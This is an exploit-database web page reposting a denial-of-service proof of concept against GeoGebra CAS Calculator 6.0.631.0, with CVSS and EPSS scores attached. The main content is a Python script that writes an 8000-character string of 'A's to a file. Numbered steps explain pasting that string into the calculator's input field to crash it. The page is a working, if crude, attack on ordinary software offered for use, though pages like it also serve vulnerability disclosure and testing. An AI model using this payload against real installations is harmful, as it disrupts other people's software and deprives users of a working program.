Advertisement






GeoGebra CAS Calculator 6.0.631.0 Denial Of Service

CVE Category Price Severity
CWE-XXX Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2021-03-16
CPE
cpe:cpe:/a:geogebra:geogebra_cas_calculator:6.0.631.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.00341 0.80505

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030084

Below is a copy:

GeoGebra CAS Calculator 6.0.631.0 Denial Of Service
# Exploit Title: GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Exploit Author: Brian Rodriguez
# Vendor Homepage: https://www.geogebra.org
# Software Link: https://www.geogebra.org/download
# Version: 6.0.631.0-offlinecas
# Tested on: Windows 8.1 Pro

# STEPS
# Open the program Calculadora CAS
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt in the field "Entrada..."
# Crashed

--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")
            

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum